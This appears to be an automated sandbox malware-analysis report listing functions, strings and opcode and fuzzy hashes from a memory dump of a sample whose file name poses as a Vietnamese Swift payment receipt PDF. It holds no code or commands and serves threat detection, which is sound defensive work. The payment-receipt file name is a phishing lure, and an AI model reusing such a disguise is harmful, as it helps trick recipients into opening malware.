Function 0125C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0125C77F

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: a8044a1593af28fce75e44d55b3c63f4deebddb17656abf6ed8160da2a47cf98
Instruction ID: 5ad9a27e99cc34c8532a23c7a6af791c9c676ace7b56ab3d2797378a792de1c7
Opcode Fuzzy Hash: a8044a1593af28fce75e44d55b3c63f4deebddb17656abf6ed8160da2a47cf98
Instruction Fuzzy Hash: 4D4166B1D1022DABDF61DA50CC84FEEB77CAB55714F0045A5EB08AB140EB709E99CF94

Function 01276B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01276B91

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: cb44e8ec444a12789fa1a3a8a7442bfe99c98fc2383212b0e3d864f3ec0919de
Instruction ID: 9c9ffa8928989a036823c2aa007604b717d12cebc452c0e96ca1a49b8b24eb30
Opcode Fuzzy Hash: cb44e8ec444a12789fa1a3a8a7442bfe99c98fc2383212b0e3d864f3ec0919de
Instruction Fuzzy Hash: FA311831E20B5A9AFB22DB69C858BAF7BB8DF05704F14402CEA41AB282D775D805CB50

Function 0125CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0125CAA2

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 0c39ad61799001bc3dfb7d8770bc248e41afbb21aab726686c5a951515e8b7bf
Instruction ID: da3e5803874edf4d5d3f5d4972d07213aaddefadb0983b54187769f916c66ba0
Opcode Fuzzy Hash: 0c39ad61799001bc3dfb7d8770bc248e41afbb21aab726686c5a951515e8b7bf
Instruction Fuzzy Hash: 82310336910616AFEB15DA58C881E7FBB78EB80720F014129EE01A7250F730DE10DBE0

Function 0126892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0126895E

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 2882fc2e306f1ff2994238c64842f4849852d8b011f8ea81b7e41961abf0893c
Instruction ID: 02a9ccd2798075242fa889e2aa88202d3349a68deedade98e317f3e73dbfb3f2
Opcode Fuzzy Hash: 2882fc2e306f1ff2994238c64842f4849852d8b011f8ea81b7e41961abf0893c
Instruction Fuzzy Hash: 2C01F7322323029FEA345B55D88CB667B6DEF95658B04001CF74106791CBB0A8C5C792

Function 01282000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3956ceab8c3dc459a83210332e2377a450a7cb5e8b3b40c7b6b879a3e91b2c3e
Instruction ID: c64b5ab69551c022651e7eda0f56324d8b75ed705c309f414c55c77d3c384afc
Opcode Fuzzy Hash: 3956ceab8c3dc459a83210332e2377a450a7cb5e8b3b40c7b6b879a3e91b2c3e
Instruction Fuzzy Hash: A742D531629342DFDB15EF68C890A6BBBE5EF94300F18492DFB8297291D770D845CB52

Function 01278158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9c54349c4a0dae3be21f08c43b76aef9313d4a2be227908e8ceb6415709115
Instruction ID: d0538fd5b5257553900ddbceb3b06e55009cdf5ac57d9f5029770506bf9e76e5
Opcode Fuzzy Hash: 1f9c54349c4a0dae3be21f08c43b76aef9313d4a2be227908e8ceb6415709115
Instruction Fuzzy Hash: A9427F75E102199FEB25CF69C885BAEBBF5FF48300F148199EA49EB242D7349981CF50

Function 011F2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446d4e3132a8c9f74714ae425da735fc315a118a240e036034da03ea6c138d85
Instruction ID: d8e3d7e6359a1f37469ec5540990f04bcaad4202e10d06910778959c396ffdc8
Opcode Fuzzy Hash: 446d4e3132a8c9f74714ae425da735fc315a118a240e036034da03ea6c138d85
Instruction Fuzzy Hash: FE320E70A207568FEB29CF69C8447BEBBF2FF86304F24411DD6869B285E774A845CB50

Function 0128A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66fa67e7a92acf064c3b914ebec33c7d849f2bdc546aed92256003e0cb9db7d
Instruction ID: 69384787518310f77ef25b9c21d2fad54f142636333cfb74518870e309156f9c
Opcode Fuzzy Hash: e66fa67e7a92acf064c3b914ebec33c7d849f2bdc546aed92256003e0cb9db7d
Instruction Fuzzy Hash: CF22C3706366628FEB25EF2DC051376BBF1AF44304F08845BDA868B2CADB75D452DB60

Function 011E6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9cf1f273d698de652e579128ecab6f1f818a09ffe23e0d576dcab90a1f8000c
Instruction ID: fef020c628963e93e5d097e2ea63bf8536d868c7edfc65106a23bfbbbdd4e529
Opcode Fuzzy Hash: d9cf1f273d698de652e579128ecab6f1f818a09ffe23e0d576dcab90a1f8000c
Instruction Fuzzy Hash: 4A32DE70A00615CFDB29CFA8C484BAEBBF1FF58310F548569EA56AB391D730E851CB91

Function 01204A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: e61b1fd3c0a45c1dfea7337931e705a1c2b04a9d2eb7d00c67e56bc76af7a5df
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 76F18771E2025A9BDF1ADF99D580BAEBBF5BF48714F048219EA01AB381E774DC41CB50

Function 0127892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64e30ba8f1712d29056fa8e68cbf430569c2f86167f5a41e1cdb64f24d416aa
Instruction ID: 83bfdf09d33ed047b6d6c7cafbb9b9976a9b6fbbc1cf6f2e4eca74ada75b6fa5
Opcode Fuzzy Hash: c64e30ba8f1712d29056fa8e68cbf430569c2f86167f5a41e1cdb64f24d416aa
Instruction Fuzzy Hash: 99D1FF72A2061A9BDF09CF69C845AFFBBF1AF88304F188169D955E7241E735E901CB60

Function 011E65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44443bbd1bbebebe4bfc74f983f39e4ee6b16d1a5140d09e277aead107efe313
Instruction ID: 81efdc66f8b8279f99acbc2e9997b4a2d1c2a35751fda1fd63741446f87435a6
Opcode Fuzzy Hash: 44443bbd1bbebebe4bfc74f983f39e4ee6b16d1a5140d09e277aead107efe313
Instruction Fuzzy Hash: C4E1CF71608742CFC719CF68C084A6ABBE0FF98314F45896DE99987351EB30E945CF92

Function 011D8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1002d7abe18df3d549fbd22e769c607cda9398bfc12ab22afb9a327281718550
Instruction ID: 3744bba30a0b4e733c389fb260437a4dc30bb565fa5056bcfc1392e9725dcf12
Opcode Fuzzy Hash: 1002d7abe18df3d549fbd22e769c607cda9398bfc12ab22afb9a327281718550
Instruction Fuzzy Hash: 70D1F1B1A106169FDB1CDF68C881BBA77B5FF94308F06422DEA16DB281E734E951CB50

Function 01268243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 872f685b2f5badc9b8951d4f14785593545c498551f87176f425ce80f64bd049
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: E0B16174A10746AFDF24DF99C940AABBBBDFF84304F10445EAA02977D4EA34E985CB10

Function 011F0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 7f058dabee98a492930861b7c378eaea7b7d7c19adfedf47526c1cf892c0fde8
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 9AB10431610646AFDB2DDB68C854BBEBBF7AF48300F150199E752DB292DB70E941CB90

Function 011E83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0d8fe761de45da488cb79d7e61d7b5cafebd5fb3ca6856a703869ed0d52be9
Instruction ID: 94b869959dc012f3961af168d27fe3e70477a025f139e6d2101dc867bea8a791
Opcode Fuzzy Hash: 1b0d8fe761de45da488cb79d7e61d7b5cafebd5fb3ca6856a703869ed0d52be9
Instruction Fuzzy Hash: 1CC15874618741CFE768CF19C484BAAB7E5FF88304F44492DEA8987291DB74E948CF92

Function 011DC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1eb7beb2048f6b6e873d4e8e86c09e906ebb714f3270a695b61385752dc4d73
Instruction ID: c278d49f43025264abefbe7e556ed17384a809da1a8e4f099dd2cd67670ab266
Opcode Fuzzy Hash: c1eb7beb2048f6b6e873d4e8e86c09e906ebb714f3270a695b61385752dc4d73
Instruction Fuzzy Hash: 30B17270B102668BDB28DF58C890BB9B3B1EF44704F4589EDD54AE7281DB309D86CF61

Function 0120E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd10f03f65df1fe315e2b5310504e973564a7fe8e35402494cba076cde26389a
Instruction ID: 375ada6e8eee4386612f1cf16cdd0b1758d5f4ef374f5f534169bf2fee365898
Opcode Fuzzy Hash: dd10f03f65df1fe315e2b5310504e973564a7fe8e35402494cba076cde26389a
Instruction Fuzzy Hash: 3BA14931E206569FEB26DB5CD944BAEBBB4BF40714F060615EB00AB2D2D7749D80CBD1

Function 01220185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ff330bcb52ab6e3f7a6049a7f93f4bb7f83bb4a6574555eb37bc40e83323fa
Instruction ID: 33caf9cf5bee4b7b20cb54764a549f79f68e02e08f53c575144f24242cc16d62
Opcode Fuzzy Hash: 55ff330bcb52ab6e3f7a6049a7f93f4bb7f83bb4a6574555eb37bc40e83323fa
Instruction Fuzzy Hash: 73A1E070B2062AEFDB25DF69C890BBEB7B1FF54318F004129EA05A7281DB74E855CB54

Function 012B4500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae952adde809ab9d3e136edb8a3e30517a732236f9e87a9f70946852534de17
Instruction ID: f70d2b98f566ad8b3655c240ac5d567bad17edc124dea2152f51c7e581126a16
Opcode Fuzzy Hash: 9ae952adde809ab9d3e136edb8a3e30517a732236f9e87a9f70946852534de17
Instruction Fuzzy Hash: 59A1D172A24692EFC715EF18C9C0BAAB7E9FF58344F05052CE6869B652D334ED01CB91

Function 012B2B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: c58c2cf929e0a846039d937582daec644f4dfcfd96c19b69062956fef88f455a
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: 90B13871E1061ADFDF29CFA9C880AEDBBB5FF48350F148169EA14AB355D730A941CB90

Function 012660E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c20ecef9e84168ecbc6c880b5737f4ccf9eb85217a1af10c03a765dd7f9925af
Instruction ID: f7057a1ccfe59b9cf1ba59174800dae89beaa381fd01555a73fe4dc57a6758d5
Opcode Fuzzy Hash: c20ecef9e84168ecbc6c880b5737f4ccf9eb85217a1af10c03a765dd7f9925af
Instruction Fuzzy Hash: 10919371D10216AFDB15CFA8D884BBEBFB9AF48710F154169E610EB381D774E9508BA0

Function 011FE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8334e5d43cf58ce8b69eb414a1e2be118fe2dfefc8a81a14ec3919d68eecc584
Instruction ID: de8cec38ddac4f289656c96f609432ad96805ec899f84a50d22ef0ef135a6f40
Opcode Fuzzy Hash: 8334e5d43cf58ce8b69eb414a1e2be118fe2dfefc8a81a14ec3919d68eecc584
Instruction Fuzzy Hash: 69911435A11616CBEB2CDB5CC444BBEBBA1EF98718F06406DEB05DB2A0E734D941CB91

Function 012AAB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: e7e71d7123bd0be3b4b39a3f34469a644099466b1a51c3ddab0810abc6a01e5d
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: 0281A071A2060A9FDF18CF98C481AAEBBF2FF94310F58856DDA169B344D774E901CB80

Function 0121E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e324be89a5376be42a698097ce8e23ca1833e768daefe577ad789360e64f52b
Instruction ID: 86b3217d772e35d4ec56f4eb73ca294e867f5394abe649a16b918c579d0906e7
Opcode Fuzzy Hash: 8e324be89a5376be42a698097ce8e23ca1833e768daefe577ad789360e64f52b
Instruction Fuzzy Hash: B581A57191060AEFDB26CFA9C880BEEBBF9FF58314F114429EA55A7214D770AC45CB60

Function 011FC640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec42828c5890c8475a65c11ae2751c7be6c1e2da1a0a24052aabb9507d94e26
Instruction ID: 103dd64a8f48cc61dae0dd863a48ca2e7fa0d2416a63625adfb6aa110a913aa8
Opcode Fuzzy Hash: 7ec42828c5890c8475a65c11ae2751c7be6c1e2da1a0a24052aabb9507d94e26
Instruction Fuzzy Hash: AE71A075D2566ADBCB29CFA9D450BFEBBB1FF58710F15411AEA42AB350D3709800CB90

Function 012947A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f041394651127446917a257258e23eb1578668c3bad53106be05fe7417c3610e
Instruction ID: f86dcba374da8ad55658d3b50387116d85b98b5c211f0e631cd0700e7d77f066
Opcode Fuzzy Hash: f041394651127446917a257258e23eb1578668c3bad53106be05fe7417c3610e
Instruction Fuzzy Hash: E3718070D21246EFDF20EF5DEA58A9EBBF9FF94300B10415AE710AB258C7358942CB54

Function 011F260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0555a0d830dd4ca43615273e41787080ee8ce94d637c8bb63df7c80aa6e6bcd8
Instruction ID: 1fb3cbecb8694fee4bcddd77fa1e6a2dee0e28ffa705a42744a5b8d75450327f
Opcode Fuzzy Hash: 0555a0d830dd4ca43615273e41787080ee8ce94d637c8bb63df7c80aa6e6bcd8
Instruction Fuzzy Hash: B771E2316146429FD719DF2CC480B2AB7E5FF88314F0585AAE999CB352DB34DC45CB92

Function 0126035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: e129c3e99391acc5895278b3b1d4e8f33c5ccc7da77f1ef9c1746055b1cd7ff9
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: A9718F71A1061AEFCB14DFA9C944EEEBBB8FF48304F104569E605E7290DB34EA41CB94

Function 012762A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b27d85617dbdd2b3bdd526ab722acdf82ca2c8f4bc5b33a9f867d18f5d250e
Instruction ID: 6dea6ab627e6408d6c9f301d524494a5450dd1a13fb71d966ec46d5c6cc4486e
Opcode Fuzzy Hash: 35b27d85617dbdd2b3bdd526ab722acdf82ca2c8f4bc5b33a9f867d18f5d250e
Instruction Fuzzy Hash: 6E71EF32260B02AFEB368F18C855F6BBBB6EB44720F144428E3168B2A0D775E944CB50

Function 011E8AA0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed184a5d6ac8d9a43a4364ca2da7bc0f47f6ee381d051a515b5d737af02cfe6
Instruction ID: c0698247a56c558125ddc5d31dca9b29a861d04043775f167b27c93d6e6e5f1e
Opcode Fuzzy Hash: 3ed184a5d6ac8d9a43a4364ca2da7bc0f47f6ee381d051a515b5d737af02cfe6
Instruction Fuzzy Hash: D181E072A15346CFDB2CCF99E588BADBBF2BF48314F154169EA00AB291C7749D40CB90

Function 012B8324 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ff0d3914c3b2e79f3323e5daae04b9da2ed2a34f2f6f694269c50f85705daf
Instruction ID: 53c09dac4380c15636e63d00af765cf11a2e857ee4308cb427831ac633df170f
Opcode Fuzzy Hash: 05ff0d3914c3b2e79f3323e5daae04b9da2ed2a34f2f6f694269c50f85705daf
Instruction Fuzzy Hash: 4B712B71E2021ABFDF15DF94C881FEEBBB9FB04350F104129E625A7290E774AA45CB90

Function 0129A250 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d495adf6de1d9c46b15351766bc633c6a57ac0eb508302efe8d2aad0cbd460f
Instruction ID: 73bfee21f6cd81af43867c5460fb7254796f37f1f0c91f09f9f8c3fadcd1fc10
Opcode Fuzzy Hash: 5d495adf6de1d9c46b15351766bc633c6a57ac0eb508302efe8d2aad0cbd460f
Instruction Fuzzy Hash: 4D51D172924752AFDB11DE6CC884E6BBBE8EBC5750F010929FA44DB150D770ED04CBA2

Function 01288350 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f9b602292603d50cf805872974e512c5e2c5db7643f4637da6e806afbac7bb
Instruction ID: 93110f0c7045b7a77297c919facd944b8106d763687ef54c744065252355cc73
Opcode Fuzzy Hash: b9f9b602292603d50cf805872974e512c5e2c5db7643f4637da6e806afbac7bb
Instruction Fuzzy Hash: 1651DD70921706EBD720EF5AC880A6BFBF9FF54710F50461EE292976E1C7B0A940CB50

Function 0121E443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11b0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6e8dd45e306b4fbd3695c602b17ca7a167b273e576cee58406584d0781318d0
